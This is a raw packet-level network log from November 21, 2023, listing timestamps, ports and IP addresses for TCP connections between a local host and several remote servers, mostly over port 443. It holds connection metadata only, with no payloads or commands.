                                                                          Nov 21, 2023 17:58:45.143788099 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.158507109 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.185262918 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.230398893 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.230480909 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.230500937 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.230545044 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.230552912 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.230566978 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.230598927 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.230659962 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.230715036 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.230772972 CET49781443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.230803967 CET44349781172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.383981943 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.384536028 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.384598970 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.385503054 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.385584116 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.387204885 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.387271881 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.387646914 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.387665033 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.421642065 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.421690941 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.421716928 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.421747923 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.421751976 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.421765089 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.421792984 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.421928883 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.421948910 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.421981096 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.421987057 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.422038078 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.422450066 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.422555923 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.422584057 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.422610044 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.422616005 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.422653913 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.423268080 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.423338890 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.423383951 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.424719095 CET49787443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:45.424727917 CET44349787172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:45.437660933 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.654366970 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.654448032 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.654478073 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.654535055 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.654578924 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.654640913 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.657393932 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.660276890 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.660301924 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.660346031 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.660363913 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.660424948 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.662285089 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.662353992 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.662431002 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.662492990 CET49788443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.662523031 CET44349788172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.886822939 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.886859894 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:45.886940002 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.888246059 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:45.888258934 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.156780005 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.157143116 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.157160997 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.157461882 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.157859087 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.157917976 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.158778906 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.205259085 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.465675116 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.465744019 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.465770006 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.465859890 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.465907097 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.465949059 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.468329906 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.471386909 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.471410990 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.471472979 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.471493006 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.471530914 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.474550009 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.477502108 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.477526903 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.477579117 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.477595091 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.477691889 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.480568886 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.480676889 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.480773926 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.481256008 CET49789443192.168.2.4172.64.96.16
                                                                          Nov 21, 2023 17:58:46.481273890 CET44349789172.64.96.16192.168.2.4
                                                                          Nov 21, 2023 17:58:46.672710896 CET49790443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:46.672739029 CET44349790104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:46.672816038 CET49790443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:46.673449993 CET49790443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:46.673461914 CET44349790104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:46.931292057 CET44349790104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:46.931570053 CET49790443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:46.931586981 CET44349790104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:46.932446957 CET44349790104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:46.932507992 CET49790443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:46.976140976 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:46.976177931 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:46.976244926 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:46.978274107 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:46.978286028 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:47.119081020 CET49790443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.119179964 CET44349790104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.119313955 CET49790443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.119328976 CET44349790104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.173295975 CET49790443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.261326075 CET44349790104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.261409998 CET44349790104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.261481047 CET49790443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.262309074 CET49790443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.262322903 CET44349790104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.263740063 CET49792443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.263792992 CET44349792104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.263856888 CET49792443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.266309023 CET49792443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.266329050 CET44349792104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.473783970 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:47.473942995 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:47.476931095 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:47.476943016 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:47.477165937 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:47.517402887 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:47.527082920 CET44349792104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.542468071 CET49792443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.542498112 CET44349792104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.542850018 CET44349792104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.544971943 CET49792443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.545033932 CET44349792104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.545128107 CET49792443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.585261106 CET44349792104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.842576981 CET44349792104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.842622042 CET44349792104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:47.842694998 CET49792443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.844540119 CET49792443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:47.844573021 CET44349792104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.000633001 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.000662088 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.000718117 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.001176119 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.001189947 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.262573957 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.307610035 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.506227970 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.506254911 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.507320881 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.507400036 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.516344070 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.516428947 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.516510963 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.516520023 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.542077065 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:48.566943884 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.589258909 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.663944006 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.664457083 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.664505959 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.664515972 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.664879084 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.664916039 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.664927006 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.664933920 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.664971113 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.664978027 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.664984941 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.665021896 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.665632010 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.665704012 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.665735006 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.665749073 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.665755033 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.665793896 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.666496038 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.666574955 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.666627884 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.666712046 CET49794443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:48.666724920 CET44349794104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:48.864193916 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.864222050 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.864229918 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.864238977 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.864265919 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.864330053 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:48.864356995 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.864399910 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:48.864447117 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.864501953 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:48.864507914 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.864516973 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.864567995 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:48.905057907 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:48.905092955 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:48.905118942 CET49791443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:58:48.905132055 CET4434979120.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:58:52.908001900 CET44349746104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:52.908072948 CET44349746104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:52.908132076 CET49746443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:53.822396994 CET49746443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:53.822422028 CET44349746104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:59:04.230036974 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.230098963 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.230185032 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.231144905 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.231154919 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.427956104 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.428241968 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.428267956 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.428615093 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.428690910 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.429220915 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.429301977 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.430471897 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.430525064 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.430625916 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.430633068 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.485800982 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.717807055 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.717945099 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.718010902 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.718436956 CET49798443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.718449116 CET44349798172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.721357107 CET49799443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.721379995 CET44349799172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.721446037 CET49799443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.722191095 CET49800443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.722207069 CET44349800172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.722271919 CET49800443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.722491026 CET49799443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.722507954 CET44349799172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.722868919 CET49800443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.722882986 CET44349800172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.847146034 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:04.931060076 CET44349799172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.931446075 CET49799443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.931471109 CET44349799172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.931885958 CET44349799172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.932245970 CET49799443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.932307959 CET44349799172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.932370901 CET49799443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.933299065 CET44349800172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.933465958 CET49800443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.933482885 CET44349800172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.933864117 CET44349800172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.934166908 CET49800443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.934230089 CET44349800172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.934246063 CET49800443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:04.942024946 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:04.942117929 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:04.942344904 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:04.973297119 CET44349799172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.981266022 CET44349800172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:04.987529039 CET49800443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:05.037092924 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.038180113 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.038212061 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.038228989 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.038243055 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.038276911 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.038291931 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.038317919 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.038345098 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.038378954 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.040553093 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.041048050 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.136161089 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.150058031 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.155073881 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.155240059 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.156203985 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.182008028 CET44349799172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:05.182137012 CET44349799172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:05.182214975 CET49799443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:05.182980061 CET49799443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:05.183000088 CET44349799172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:05.207349062 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.597053051 CET44349800172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:05.597163916 CET44349800172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:05.597223997 CET49800443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:05.597611904 CET49800443192.168.2.4172.253.122.113
                                                                          Nov 21, 2023 17:59:05.597630024 CET44349800172.253.122.113192.168.2.4
                                                                          Nov 21, 2023 17:59:05.598388910 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.610150099 CET498025228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.698702097 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.704933882 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.704998970 CET498025228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.705332994 CET498025228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.718277931 CET804973845.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:59:05.718354940 CET4973880192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:59:05.740376949 CET49803443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:05.740406990 CET44349803172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:05.740468025 CET49803443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:05.740880966 CET49803443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:05.740896940 CET44349803172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:05.800165892 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.801032066 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.801047087 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.801059961 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.801073074 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.801115036 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.801126957 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.801181078 CET498025228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.801300049 CET498025228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.802781105 CET498025228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.803503036 CET498025228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.898369074 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.912530899 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.916460991 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.916548014 CET498025228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:05.918253899 CET522849802172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:05.920068026 CET804974145.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:59:05.920167923 CET4974180192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:59:05.973073959 CET498025228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:06.003324986 CET44349803172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.003827095 CET49803443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.003859043 CET44349803172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.004882097 CET44349803172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.004996061 CET49803443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.006901026 CET49803443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.006969929 CET44349803172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.007118940 CET49803443192.168.2.4172.67.173.33
